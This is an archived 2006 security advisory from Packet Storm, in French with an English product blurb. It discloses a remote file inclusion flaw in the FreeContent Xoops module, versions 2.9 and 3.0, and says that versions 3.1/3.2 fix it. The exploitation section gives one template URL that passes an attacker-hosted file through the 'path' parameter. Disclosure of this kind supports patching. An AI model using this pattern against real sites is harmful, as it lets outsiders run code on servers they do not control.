what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreeContent.txt

FreeContent.txt
Posted Apr 17, 2006
Authored by Silitix

Freecontent v2.9 and 3.0 suffer from a remote file inclusion vulnerability.

tags | advisory, remote, file inclusion
SHA-256 | 0c5a8a2a0dc2b4c5e66a279fc98f6a223de63ba736156083d1893868541416fc
Download | Favorite | View

FreeContent.txt

Change Mirror Download
------=_Part_19161_13964465.1145017194132
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent

La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres
versions peuvent =E9galement =EAtre affect=E9es.

Probl=E8me : Remote File Inclusion

Site officiel : http://www.wjue.org/ & http://www.guanxicrm.com/

Auteur : Silitix - Silitix@gmail.com

Description FR :
#############

Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur
xoops, maintenant d=E9tron=E9 par CJay-Content
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement
d=E9posez sur votre serveur.
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt
les liens URL qui se trouveraient dans
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =E7=E0 !
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles
apparaissent dans le bloc.

Description ENG :
#################

With WebDigest capability FreeContent becomes the first Knowledge oriented
content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but
also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and
information.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o
automatically generate
relevant contents for your website.


Exploitation :
###########

         http://[target]/modules/freecontent/index.php?path=3D[attacker]

Solution
#########

 Appliquer la mise =E0 jour disponible sur le sitte officiel, les
versions 3.1/3.2
ne sont pas affect=E9es.

###### ---- > Avis de s=E9curit=E9 original : www.Silitix.com/freecontent.t=
xt

------=_Part_19161_13964465.1145017194132
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent<br>
<br>
La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres versions peuvent =E9galement =EAtre affect=E9es.<br>
<br>
Probl=E8me : Remote File Inclusion<br>
<br>
Site officiel : <a href=3D"http://www.wjue.org/">http://www.wjue.org/</a> &=
amp; <a href=3D"http://www.guanxicrm.com/">http://www.guanxicrm.com/</a><br=
>
<br>
Auteur : Silitix - <a href=3D"mailto:Silitix@gmail.com">Silitix@gmail.com</=
a> <br>
<br>
Description FR : <br>
#############<br>
<br>
Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur xoops, maintenant d=E9tron=E9 par CJay-Content <br>
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !<br=
>
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement=
 d=E9posez sur votre serveur.<br>
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt les liens URL qui se trouveraient dans<br>
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =
=E7=E0 !<br>
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles appara=
issent dans le bloc.<br>
<br>
Description ENG :<br>
#################<br>
<br>
With WebDigest capability FreeContent becomes the first Knowledge oriented =
content tool for Xoops.<br>
FreeContent allows you not only to present easily a variety of contents but=
 also to make concept/topic oriented <br>
WebIntelligence, to organize <br>
community discussion with always up to date and fresh content and informati=
on.<br>
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o automatically generate <br>
relevant contents for your website.<br>
<br>
<br>
Exploitation : <br>
###########<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; http://[target]/modules/fr=
eecontent/index.php?path=3D[attacker]<br>
<br>
Solution<br>
#########<br>
<br>
&nbsp;Appliquer la mise =E0 jour disponible sur le sitte officiel, les vers=
ions 3.1/3.2 ne sont pas affect=E9es.<br>
<br>
###### ---- > Avis de s=E9curit=E9 original : <a href=3D"http://www.Sili=
tix.com/freecontent.txt">www.Silitix.com/freecontent.txt</a><br>
<br>

------=_Part_19161_13964465.1145017194132--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close